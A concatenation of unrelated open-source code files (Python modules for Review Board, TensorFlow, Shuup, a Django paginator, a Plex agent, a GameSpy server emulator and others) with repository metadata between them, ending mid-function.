built-in :py:class:`reviewboard.datagrids.sidebar.BaseSidebarSection` and
built-in :py:class:`reviewboard.datagrids.sidebar.SidebarNavItem`.
"""
def __init__(self, extension, item_classes):
super(UserPageSidebarItemsHook, self).__init__(
extension, UserPageReviewRequestDataGrid, item_classes)
__all__ = [
'AccountPageFormsHook',
'AccountPagesHook',
'ActionHook',
'AdminWidgetHook',
'AuthBackendHook',
'CommentDetailDisplayHook',
'DashboardColumnsHook',
'DashboardSidebarItemsHook',
'DataGridColumnsHook',
'DataGridSidebarItemsHook',
'DiffViewerActionHook',
'ExtensionHook',
'FileAttachmentThumbnailHook',
'HeaderActionHook',
'HeaderDropdownActionHook',
'HostingServiceHook',
'NavigationBarHook',
'ReviewRequestActionHook',
'ReviewRequestApprovalHook',
'ReviewRequestDropdownActionHook',
'ReviewRequestFieldSetsHook',
'ReviewRequestFieldsHook',
'ReviewUIHook',
'SignalHook',
'TemplateHook',
'URLHook',
'UserPageSidebarItemsHook',
'WebAPICapabilitiesHook',
]
|
custode/reviewboard
|
reviewboard/extensions/hooks.py
|
Python
|
mit
| 20,845
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions implementing to Model SavedModel serialization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.saving import saving_utils
from tensorflow.python.keras.saving.saved_model import constants
from tensorflow.python.keras.saving.saved_model import network_serialization
from tensorflow.python.keras.saving.saved_model import save_impl
class ModelSavedModelSaver(network_serialization.NetworkSavedModelSaver):
"""Model SavedModel serialization."""
@property
def object_identifier(self):
return '_tf_keras_model'
def _python_properties_internal(self):
metadata = super(ModelSavedModelSaver, self)._python_properties_internal()
metadata.update(
saving_utils.model_metadata(
self.obj, include_optimizer=True, require_config=False))
return metadata
def _get_serialized_attributes_internal(self, serialization_cache):
default_signature = None
# Create a default signature function if this is the only object in the
# cache (i.e. this is the root level object).
if len(serialization_cache[constants.KERAS_CACHE_KEY]) == 1:
default_signature = save_impl.default_save_signature(self.obj)
# Other than the default signature function, all other attributes match with
# the ones serialized by Layer.
objects, functions = (
super(ModelSavedModelSaver, self)._get_serialized_attributes_internal(
serialization_cache))
functions['_default_save_signature'] = default_signature
return objects, functions
class SequentialSavedModelSaver(ModelSavedModelSaver):
@property
def object_identifier(self):
return '_tf_keras_sequential'
|
chemelnucfin/tensorflow
|
tensorflow/python/keras/saving/saved_model/model_serialization.py
|
Python
|
apache-2.0
| 2,441
|
from base import BaseClient
NURTURING_API_VERSION = '1'
class NurturingClient(BaseClient):
def _get_path(self, subpath):
return 'nurture/v%s/%s' % (NURTURING_API_VERSION, subpath)
def get_campaigns(self, **options):
return self._call('campaigns', **options)
def get_leads(self, campaign_guid, **options):
return self._call('campaign/%s/list' % campaign_guid, **options)
def get_history(self, lead_guid, **options):
return self._call('lead/%s' % lead_guid, **options)
def enroll_lead(self, campaign_guid, lead_guid, **options):
return self._call('campaign/%s/add' % campaign_guid, data=lead_guid, method='POST', **options)
def unenroll_lead(self, campaign_guid, lead_guid, **options):
return self._call('campaign/%s/remove' % campaign_guid, data=lead_guid, method='POST', **options)
|
ack8006/hapipy
|
hapi/nurturing.py
|
Python
|
apache-2.0
| 890
|
# -*- coding: utf-8 -*-
#
# OpenCraft -- tools to aid developing and hosting free software projects
# Copyright (C) 2015-2019 OpenCraft <contact@opencraft.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Tests - Base Class & Utils
"""
# Imports #####################################################################
from rest_framework.test import APIClient, APIRequestFactory
from instance.tests.base import WithUserTestCase
# Tests #######################################################################
class APITestCase(WithUserTestCase):
"""
Base class for API tests
"""
def setUp(self):
super().setUp()
self.api_factory = APIRequestFactory()
self.api_client = APIClient()
|
open-craft/opencraft
|
instance/tests/api/base.py
|
Python
|
agpl-3.0
| 1,343
|
#!/usr/bin/env python3
# Copyright (c) 2011 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. It is provided for educational
# purposes and is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import unittest
import Atomic
class TestAtomic(unittest.TestCase):
def setUp(self):
self.original_list = list(range(10))
def test_list_succeed(self):
items = self.original_list[:]
with Atomic.Atomic(items) as atomic:
atomic.append(1999)
atomic.insert(2, -915)
del atomic[5]
atomic[4] = -782
atomic.insert(0, -9)
self.assertEqual(items,
[-9, 0, 1, -915, 2, -782, 5, 6, 7, 8, 9, 1999])
def test_list_fail(self):
def process():
nonlocal items
with Atomic.Atomic(items) as atomic:
atomic.append(1999)
atomic.insert(2, -915)
del atomic[5]
atomic[4] = -782
atomic.poop() # Typo
items = self.original_list[:]
self.assertRaises(AttributeError, process)
self.assertEqual(items, self.original_list)
if __name__ == "__main__":
unittest.main()
|
therealjumbo/python_summer
|
py31eg/test_Atomic.py
|
Python
|
gpl-3.0
| 1,613
|
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import os
import struct
import sys
def write_uvarint(w, val):
"""Writes a varint value to the supplied file-like object.
Args:
w (object): A file-like object to write to. Must implement write.
val (number): The value to write. Must be >= 0.
Returns (int): The number of bytes that were written.
Raises:
ValueError if 'val' is < 0.
"""
if val < 0:
raise ValueError('Cannot encode negative value, %d' % (val,))
count = 0
while val > 0 or count == 0:
byte = (val & 0b01111111)
val >>= 7
if val > 0:
byte |= 0b10000000
w.write(struct.pack('B', byte))
count += 1
return count
def read_uvarint(r):
"""Reads a uvarint from a stream.
This is targeted towards testing, and will not be used in production code.
Args:
r (object): A file-like object to read from. Must implement read.
Returns: (value, count)
value (int): The decoded varint number.
count (int): The number of bytes that were read from 'r'.
Raises:
ValueError if the encoded varint is not terminated.
"""
count = 0
result = 0
while True:
byte = r.read(1)
if len(byte) == 0:
raise ValueError('UVarint was not terminated')
byte = struct.unpack('B', byte)[0]
result |= ((byte & 0b01111111) << (7 * count))
count += 1
if byte & 0b10000000 == 0:
break
return result, count
|
chromium/chromium
|
third_party/logdog/logdog/varint.py
|
Python
|
bsd-3-clause
| 1,542
|
'''Simple program to show MIDI note number (key) transposition.'''
import midi_util
from midi_util import NoteTransposer
from pyportmidi import midi
if __name__ == '__main__':
midi.init()
TRANSPOSITION_MAP = {37: 47,
38: 48,
39: 49,
40: 50,
41: 51,
42: 52,
43: 53,
44: 54,
45: 55,
46: 56,
47: 57,
48: 58,
49: 59}
nanopad_transposer = NoteTransposer("nanoPAD2 PAD",
"IAC Driver Bus 1",
TRANSPOSITION_MAP)
nanopad_transposer.run()
midi.quit()
|
aoeu/python-examples
|
pyportmidi_examples/transpose_midi.py
|
Python
|
mit
| 845
|
"""empty message
Revision ID: 92d260834de
Revises: None
Create Date: 2014-07-13 13:46:53.505094
"""
# revision identifiers, used by Alembic.
revision = '92d260834de'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('title',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('title_number', sa.String(length=9), nullable=True),
sa.Column('address', sa.String(length=1000), nullable=True),
sa.Column('post_code', sa.String(length=25), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('title_number')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('title')
### end Alembic commands ###
|
LandRegistry/public-titles
|
migrations/versions/92d260834de_.py
|
Python
|
mit
| 853
|
# This file is part of the Frescobaldi project, http://www.frescobaldi.org/
#
# Copyright (c) 2008 - 2016 by Wilbert Berendsen
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# See http://www.gnu.org/licenses/ for more information.
"""
All kinds of more or less generally usable Qt gadgets.
Most of them interact with Qt widgets, filtering events,
customizing behaviour etc.
These modules only depend on PyQt.
"""
|
dliessi/frescobaldi
|
frescobaldi_app/gadgets/__init__.py
|
Python
|
gpl-2.0
| 1,075
|
# -*- coding: utf-8 -*-
# (C) 2017 Carlos Serra-Toro <carlos.serra@braintec-group.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import test_bank
from . import test_lsv_export_wizard
from . import test_dd_export_wizard
from . import test_lsv_dd
|
CompassionCH/l10n-switzerland
|
l10n_ch_lsv_dd/tests/__init__.py
|
Python
|
agpl-3.0
| 280
|
# coding=utf-8
from setuptools import setup
from setuptools.command.test import test
class TestHook(test):
def run_tests(self):
import nose
nose.main(argv=['nosetests', 'tests/', '-v', '--logging-clear-handlers'])
setup(
name='lxml-asserts',
version='0.1.2',
description='Handy functions for testing lxml etree objects for equality and compatibility',
url='https://github.com/SuminAndrew/lxml-asserts',
author='Andrew Sumin',
author_email='sumin.andrew@gmail.com',
classifiers=[
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Testing',
],
license="http://www.apache.org/licenses/LICENSE-2.0",
cmdclass={
'test': TestHook
},
packages=[
'lxml_asserts'
],
install_requires=[
'lxml',
],
test_suite='tests',
tests_require=[
'nose',
'pycodestyle == 2.3.1'
],
zip_safe=False
)
|
SuminAndrew/lxml-asserts
|
setup.py
|
Python
|
apache-2.0
| 1,329
|
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import json
from django.forms import HiddenInput, Widget
from django.utils.encoding import force_text
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from filer.models import File
from shuup.admin.utils.forms import flatatt_filter
from shuup.admin.utils.urls import get_model_url, NoModelUrl
from shuup.core.models import Contact, PersonContact, Product, ProductMode
class BasePopupChoiceWidget(Widget):
browse_kind = None
filter = None
def __init__(self, attrs=None, clearable=False, empty_text=u"\u2014"):
self.clearable = clearable
self.empty_text = empty_text
super(BasePopupChoiceWidget, self).__init__(attrs)
def get_browse_markup(self):
icon = "<i class='fa fa-folder'></i>"
return "<button class='browse-btn btn btn-info btn-sm' type='button'>%(icon)s %(text)s</button>" % {
"icon": icon,
"text": _("Browse")
}
def get_clear_markup(self):
icon = "<i class='fa fa-cross'></i>"
return "<button class='clear-btn btn btn-default btn-sm' type='button'>%(icon)s %(text)s</button>" % {
"icon": icon,
"text": _("Clear")
}
def render_text(self, obj):
url = getattr(obj, "url", None)
text = self.empty_text
if obj:
text = force_text(obj)
if not url:
try:
url = get_model_url(obj)
except NoModelUrl:
pass
if not url:
url = "#"
return mark_safe("<a class=\"browse-text\" href=\"%(url)s\" target=\"_blank\">%(text)s</a> " % {
"text": escape(text),
"url": escape(url),
})
def get_object(self, value):
raise NotImplementedError("Not implemented")
def render(self, name, value, attrs=None):
if value:
obj = self.get_object(value)
else:
obj = None
pk_input = HiddenInput().render(name, value, attrs)
media_text = self.render_text(obj)
bits = [self.get_browse_markup(), pk_input, " ", media_text]
if self.clearable:
bits.insert(1, self.get_clear_markup())
return mark_safe("<div %(attrs)s>%(content)s</div>" % {
"attrs": flatatt_filter({
"class": "browse-widget %s-browse-widget" % self.browse_kind,
"data-browse-kind": self.browse_kind,
"data-clearable": self.clearable,
"data-empty-text": self.empty_text,
"data-filter": self.filter
}),
"content": "".join(bits)
})
class MediaChoiceWidget(BasePopupChoiceWidget):
browse_kind = "media"
def get_object(self, value):
return File.objects.get(pk=value)
class ImageChoiceWidget(MediaChoiceWidget):
filter = "images"
class ProductChoiceWidget(BasePopupChoiceWidget):
browse_kind = "product"
def get_object(self, value):
return Product.objects.get(pk=value)
class ContactChoiceWidget(BasePopupChoiceWidget):
browse_kind = "contact"
def get_object(self, value):
return Contact.objects.get(pk=value)
def get_browse_markup(self):
icon = "<i class='fa fa-user'></i>"
return "<button class='browse-btn btn btn-info btn-sm' type='button'>%(icon)s %(text)s</button>" % {
"icon": icon,
"text": _("Select")
}
class PersonContactChoiceWidget(ContactChoiceWidget):
@property
def filter(self):
return json.dumps({"groups": [PersonContact.get_default_group().pk]})
class PackageProductChoiceWidget(ProductChoiceWidget):
filter = json.dumps({"modes": [ProductMode.NORMAL.value, ProductMode.VARIATION_CHILD.value]})
|
suutari/shoop
|
shuup/admin/forms/widgets.py
|
Python
|
agpl-3.0
| 4,135
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def get_version(*file_paths):
"""Retrieves the version from unach_photo_server/__init__.py"""
filename = os.path.join(os.path.dirname(__file__), *file_paths)
version_file = open(filename).read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError('Unable to find version string.')
version = get_version("unach_photo_server", "__init__.py")
if sys.argv[-1] == 'publish':
try:
import wheel
print("Wheel version: ", wheel.__version__)
except ImportError:
print('Wheel library missing. Please run "pip install wheel"')
sys.exit()
os.system('python setup.py sdist upload')
os.system('python setup.py bdist_wheel upload')
sys.exit()
if sys.argv[-1] == 'tag':
print("Tagging the version on git:")
os.system("git tag -a %s -m 'version %s'" % (version, version))
os.system("git push --tags")
sys.exit()
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
setup(
name='unach-photo-server',
version=version,
description="""Aplicación web encargada de conectar con los repositorios de fotografías dispersos en la unach y generar servicios web para consultar por las fotografías de usuarios.""",
long_description=readme + '\n\n' + history,
author='Javier Huerta',
author_email='javierhuerta@unach.cl',
url='https://github.com/javierhuerta/unach-photo-server',
packages=[
'unach_photo_server',
],
include_package_data=True,
install_requires=["django-model-utils>=2.0", "MySQL-python>=1.2.5", "pysmb>=1.1.19"],
license="MIT",
zip_safe=False,
keywords='unach-photo-server',
classifiers=[
'Development Status :: 3 - Alpha',
'Framework :: Django',
'Framework :: Django :: 1.10',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)
|
javierhuerta/unach-photo-server
|
setup.py
|
Python
|
mit
| 2,500
|
from functools import reduce
from operator import or_
from chamber.shortcuts import get_object_or_none
from django.db.models import Q
from django.db.models.expressions import OrderBy
from django.utils.translation import ugettext
from .forms import RestValidationError
from .exception import RestException
from .utils.compatibility import get_last_parent_pk_field_name
from .utils.helpers import ModelIterableIteratorHelper
from .response import HeadersResponse
def _get_attr(obj, attr):
if '__' in attr:
rel_obj, rel_attr = attr.split('__')
return _get_attr(getattr(obj, rel_obj), rel_attr)
else:
return getattr(obj, attr)
class BasePaginator:
def get_response(self, qs, request):
raise NotImplementedError
class BaseModelOffsetBasedPaginator(BasePaginator):
iterable_helper_class = ModelIterableIteratorHelper
def __init__(self, max_offset=pow(2, 63) - 1, max_base=100, default_base=20):
self.max_offset = max_offset
self.max_base = max_base
self.default_base = default_base
def _get_model(self, qs):
raise NotImplementedError
def _get_list_from_queryset(self, qs, from_, to_):
raise NotImplementedError
def _get_total(self, qs, request):
raise NotImplementedError
def _get_offset(self, qs, request):
offset = request._rest_context.get('offset', '0')
if offset.isdigit():
offset_int = int(offset)
if offset_int > self.max_offset:
raise RestException(ugettext('Offset must be lower or equal to {}').format(self.max_offset))
else:
return offset_int
else:
raise RestException(ugettext('Offset must be natural number'))
def _get_base(self, qs, request):
base = request._rest_context.get('base')
if not base:
return self.default_base
elif base.isdigit():
base_int = int(base)
if base_int > self.max_base:
raise RestException(ugettext('Base must lower or equal to {}').format(self.max_base))
else:
return base_int
else:
raise RestException(ugettext('Base must be natural number or empty'))
def _get_next_offset(self, iterable, offset, base):
return offset + base if len(iterable) > base else None
def _get_prev_offset(self, iterable, offset, base):
return None if offset == 0 or not base else max(offset - base, 0)
def _get_headers(self, total, next_offset, prev_offset):
return {
k: v for k, v in {
'X-Total': total,
'X-Next-Offset': next_offset,
'X-Prev-Offset': prev_offset,
}.items() if v is not None
}
def get_response(self, qs, request):
base = self._get_base(qs, request)
total = self._get_total(qs, request)
offset = self._get_offset(qs, request)
model = self._get_model(qs)
# To check next offset, one more object is get from queryset
iterable = self._get_list_from_queryset(qs, offset, offset + base + 1)
next_offset = self._get_next_offset(iterable, offset, base)
prev_offset = self._get_prev_offset(iterable, offset, base)
return HeadersResponse(
self.iterable_helper_class(iterable[:base], model),
self._get_headers(total, next_offset, prev_offset)
)
class DjangoOffsetBasedPaginator(BaseModelOffsetBasedPaginator):
"""
REST paginator for list and querysets
"""
def _get_model(self, qs):
return qs.model
def _get_list_from_queryset(self, qs, from_, to_):
return list(qs[from_:to_])
def _get_total(self, qs, request):
return qs.count()
class DjangoOffsetBasedPaginatorWithoutTotal(DjangoOffsetBasedPaginator):
def _get_total(self, qs, request):
return None
class CursorBasedModelIterableIteratorHelper(ModelIterableIteratorHelper):
def __init__(self, iterable, model, next):
super().__init__(iterable, model)
self.next = next
class DjangoCursorBasedPaginator(BasePaginator):
def __init__(self, max_base=100, default_base=20):
self.max_base = max_base
self.default_base = default_base
def get_response(self, qs, request):
base = self._get_base(request)
cursor = self._get_cursor(request)
ordering = self._get_ordering(request, qs)
cursor_based_model_iterable = self._get_paged_qs(qs, ordering, cursor, base)
return HeadersResponse(
cursor_based_model_iterable,
self.get_headers(cursor_based_model_iterable.next)
)
def _get_page_filter_kwargs(self, current_row, ordering):
ordering = list(ordering)
args_or = []
while ordering:
base_order_field_name = ordering.pop()
is_reverse = base_order_field_name.startswith('-')
base_order_field_name = self._get_field_name(base_order_field_name)
base_order_filtered_value = _get_attr(current_row, base_order_field_name)
if base_order_filtered_value is None:
if is_reverse:
filter_lookup = Q(**{'{}__isnull'.format(base_order_field_name): False})
else:
# skip this filter
continue
else:
if is_reverse:
filter_lookup = Q(
**{'{}__lt'.format(base_order_field_name): base_order_filtered_value}
)
else:
filter_lookup = Q(
**{'{}__gt'.format(base_order_field_name): base_order_filtered_value}
) | Q(
**{'{}__isnull'.format(base_order_field_name): True}
)
args_or.append(
Q(
filter_lookup,
Q(**{
self._get_field_name(order): _get_attr(
current_row, self._get_field_name(order)
) for order in ordering
})
)
)
return reduce(or_, args_or)
def _get_page(self, qs, base):
results = list(qs[:base + 1])
page = list(results[:base])
next_cursor = self._get_position_from_instance(page[-1]) if len(results) > len(page) else None
return CursorBasedModelIterableIteratorHelper(page, qs.model, next=next_cursor)
@property
def _get_paged_qs(self, qs, ordering, cursor, base):
qs = qs.order_by(*ordering)
if cursor:
current_row = get_object_or_none(qs, pk=cursor)
if current_row:
qs = qs.filter(self._get_page_filter_kwargs(current_row))
else:
raise RestException(RestValidationError(ugettext('Cursor object was not found')))
return self._get_page(qs, base)
def _get_base(self, request):
base = request._rest_context.get('base')
if not base:
return self.default_base
elif base.isdigit():
base_int = int(base)
if base_int > self.max_base:
raise RestException(ugettext('Base must lower or equal to {}').format(self.max_base))
else:
return base_int
else:
raise RestException(ugettext('Base must be natural number or empty'))
def _get_cursor(self, request):
return request._rest_context.get('cursor')
def _get_ordering(self, request, qs):
pk_field_name = get_last_parent_pk_field_name(qs.model)
query_ordering = list(qs.query.order_by) or list(qs.model._meta.ordering)
ordering = []
for order_lookup in query_ordering:
if isinstance(order_lookup, OrderBy):
ordering.append(
'-' + order_lookup.expression.name if order_lookup.descending else order_lookup.expression.name
)
else:
ordering.append(order_lookup)
if self._pk_field_name not in ordering:
ordering.append(pk_field_name)
return ordering
def _get_position_from_instance(self, instance):
pk_field_name = get_last_parent_pk_field_name(instance.__class__)
if isinstance(instance, dict):
attr = instance[pk_field_name]
else:
attr = getattr(instance, pk_field_name)
return str(attr)
def _get_field_name(self, order_lookup):
return order_lookup[1:] if order_lookup.startswith('-') else order_lookup
def get_headers(self, next_cursor):
return {
k: v for k, v in {
'X-Next-Cursor': next_cursor,
}.items() if v is not None
}
|
druids/django-pyston
|
pyston/paginator.py
|
Python
|
bsd-3-clause
| 8,855
|
from django.http import HttpResponseForbidden
from cloud_ide.fiddle.jsonresponse import JsonResponse
import urllib2, base64, urlparse
from HTMLParser import HTMLParseError
from bs4 import BeautifulSoup as BS
def scrape(request):
url = request.GET['url']
if not urlparse.urlparse(url).scheme[0:4] == 'http':
return HttpResponseForbidden()
response_dict = {}
success = False
try:
response = urllib2.urlopen(url)
html = response.read(200000) #200 kiloBytes
document = BS(html)
body = str(document.body)
resources = []
inlineJavascriptBlocks = []
inlineCssBlocks = []
for styleSheet in document.findAll('link', attrs={'rel': 'stylesheet'}):
resources.append(styleSheet.get('href'))
for style in document.findAll('style'):
inlineCssBlocks.append(style.string)
scripts = document.findAll('script')
for script in scripts:
externalJavascriptSource = script.get('src', None)
if externalJavascriptSource:
resources.append(externalJavascriptSource)
else:
# if script is not a template
scriptType = script.get('type', None)
if not scriptType or scriptType is 'text/javascript':
inlineJavascriptBlocks.append(script.string)
except urllib2.HTTPError:
response_dict.update({'error': 'HTTP Error 404: Not Found'})
except HTMLParseError:
response_dict.update({'error': 'malformed HTML'})
except urllib2.URLError:
response_dict.update({'error': 'service not available'})
else:
success = True
response_dict.update({
'resources': resources,
'inlineJavascriptBlocks': inlineJavascriptBlocks,
'inlineCssBlocks': inlineCssBlocks,
'body': base64.b64encode(body)
})
response_dict.update({'success': success})
return JsonResponse(response_dict)
|
yuguang/fiddlesalad
|
utility/views.py
|
Python
|
gpl-3.0
| 2,008
|
VIDEO_ENDPOINT = "https://www.giantbomb.com/api/video/%s/?api_key=%s&format=json"
def Start():
HTTP.CacheTime = CACHE_1DAY
def getJSON(video_guid):
video_guid = str(video_guid)
url = VIDEO_ENDPOINT % (video_guid, Prefs['api_key'])
return JSON.ObjectFromURL(url)['results']
class GiantBombAgent(Agent.Movies):
name = 'Giant Bomb'
languages = [Locale.Language.English]
primary_provider = True
accepts_from = ['com.plexapp.agents.localmedia']
contributes_to = ['com.plexapp.agents.localmedia']
def search(self, results, media, lang, manual):
parts = media.name.split()
video_guid = str(parts[0]) + '-' + str(parts[1])
obj = getJSON(video_guid)
year = obj['publish_date'].split("-")[0]
results.Append(MetadataSearchResult(
id=str(video_guid.split('-')[1]),
name=obj['name'],
year=year,
score=100,
lang=lang
))
def update(self, metadata, media, lang):
obj = getJSON(metadata.id)
metadata.collections = obj['video_type'].split(', ')
metadata.duration = obj['length_seconds'] * 1000
metadata.studio = 'Giant Bomb'
metadata.summary = obj['deck']
metadata.title = obj['name']
metadata.year = int(obj['publish_date'].split("-")[0])
members = cast.cast_from_deck(obj['deck'])
for member in members:
role = metadata.roles.new()
role.role = 'Self'
role.actor = member
image = obj['image']['super_url']
metadata.posters[image] = Proxy.Media(HTTP.Request(image).content)
|
tsigo/GiantBomb.bundle
|
Contents/Code/__init__.py
|
Python
|
mit
| 1,668
|
"""DWC Network Server Emulator
Copyright (C) 2014 polaris-
Copyright (C) 2014 msoucy
Copyright (C) 2015 Sepalani
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
I found an open source implemention of this exact server I'm trying to
emulate here: (use as reference later)
https://github.com/sfcspanky/Openspy-Core/blob/master/serverbrowsing/
"""
import logging
import socket
import traceback
from twisted.internet.protocol import Factory
from twisted.internet.endpoints import serverFromString
from twisted.protocols.basic import LineReceiver
from twisted.internet import reactor
from twisted.internet.error import ReactorAlreadyRunning
import gamespy.gs_utility as gs_utils
import other.utils as utils
import dwc_config
from multiprocessing.managers import BaseManager
logger = dwc_config.get_logger('GameSpyServerBrowserServer')
class ServerListFlags:
UNSOLICITED_UDP_FLAG = 1
PRIVATE_IP_FLAG = 2
CONNECT_NEGOTIATE_FLAG = 4
ICMP_IP_FLAG = 8
NONSTANDARD_PORT_FLAG = 16
NONSTANDARD_PRIVATE_PORT_FLAG = 32
HAS_KEYS_FLAG = 64
HAS_FULL_RULES_FLAG = 128
class GameSpyServerDatabase(BaseManager):
pass
GameSpyServerDatabase.register("get_server_list")
GameSpyServerDatabase.register("modify_server_list")
GameSpyServerDatabase.register("find_servers")
GameSpyServerDatabase.register("find_server_by_address")
GameSpyServerDatabase.register("add_natneg_server")
GameSpyServerDatabase.register("get_natneg_server")
GameSpyServerDatabase.register("delete_natneg_server")
address = dwc_config.get_ip_port('GameSpyServerBrowserServer')
class GameSpyServerBrowserServer(object):
def __init__(self, qr=None):
self.qr = qr
def start(self):
endpoint = serverFromString(
reactor, "tcp:%d:interface=%s" % (address[1], address[0])
)
conn = endpoint.listen(SessionFactory(self.qr))
try:
if not reactor.running:
reactor.run(installSignalHandlers=0)
except ReactorAlreadyRunning:
pass
class SessionFactory(Factory):
def __init__(self, qr):
logger.log(logging.INFO,
"Now listening for connections on %s:%d...",
address[0], address[1])
self.secret_key_list = gs_utils.generate_secret_keys("gslist.cfg")
# TODO: Prune server cache at some point
self.server_cache = {}
self.qr = qr
def buildProtocol(self, address):
return Session(address, self.secret_key_list, self.server_cache,
self.qr)
class Session(LineReceiver):
def __init__(self, address, secret_key_list, server_cache, qr):
self.setRawMode() # We're dealing with binary data so set to raw mode
self.address = address
# Don't waste time parsing every session, so just accept it from
# the parent
self.secret_key_list = secret_key_list
self.console = 0
self.server_cache = server_cache
self.qr = qr
self.own_server = None
self.buffer = []
manager_address = dwc_config.get_ip_port('GameSpyManager')
manager_password = ""
self.server_manager = GameSpyServerDatabase(address=manager_address,
authkey=manager_password)
self.server_manager.connect()
def log(self, level, msg, *args, **kwargs):
"""TODO: Use logger format"""
logger.log(level, "[%s:%d] " + msg,
self.address.host, self.address.port,
*args, **kwargs)
def rawDataReceived(self, data):
try:
# First 2 bytes are the packet size.
#
# Third byte is the command byte.
# According to Openspy-Core:
# 0x00 - Server list request
# 0x01 - Server info request
# 0x02 - Send message request
# 0x03 - Keep alive reply
# 0x04 - Map loop request (?)
# 0x05 - Player search request
#
# For Tetris DS, at the very least 0x00 and 0x02 need to be
# implemented.
self.buffer += data
while len(self.buffer) > 0:
packet_len = utils.get_short(self.buffer, 0, True)
packet = None
if len(self.buffer) >= packet_len:
packet = self.buffer[:packet_len]
self.buffer = self.buffer[packet_len:]
if packet is None:
# Don't have enough for the entire packet, break.
break
if packet[2] == '\x00': # Server list request
self.log(logging.DEBUG,
"Received server list request from %s:%s...",
self.address.host, self.address.port)
# This code is so... not python. The C programmer in me is
# coming out strong.
# TODO: Rewrite this section later?
idx = 3
list_version = ord(packet[idx])
idx += 1
encoding_version = ord(packet[idx])
idx += 1
game_version = utils.get_int(packet, idx)
idx += 4
query_game = utils.get_string(packet, idx)
idx += len(query_game) + 1
game_name = utils.get_string(packet, idx)
idx += len(game_name) + 1
challenge = ''.join(packet[idx:idx+8])
idx += 8
filter = utils.get_string(packet, idx)
idx += len(filter) + 1
fields = utils.get_string(packet, idx)
idx += len(fields) + 1
options = utils.get_int(packet, idx, True)
idx += 4
source_ip = 0
max_servers = 0
NO_SERVER_LIST = 0x02
ALTERNATE_SOURCE_IP = 0x08
LIMIT_RESULT_COUNT = 0x80
send_ip = False
if (options & LIMIT_RESULT_COUNT):
max_servers = utils.get_int(packet, idx)
elif (options & ALTERNATE_SOURCE_IP):
source_ip = utils.get_ip(packet, idx)
elif (options & NO_SERVER_LIST):
send_ip = True
if '\\' in fields:
fields = [x for x in fields.split('\\')
if x and not x.isspace()]
# print "%02x %02x %08x" % \
# (list_version, encoding_version, game_version)
# print "%s" % query_game
# print "%s" % game_name
# print "%s" % challenge
# print "%s" % filter
# print "%s" % fields
# print "%08x" % options
# print "%d %08x" % (max_servers, source_ip)
self.log(logging.DEBUG,
"list version: %02x / encoding version: %02x /"
" game version: %08x / query game: %s /"
" game name: %s / challenge: %s / filter: %s /"
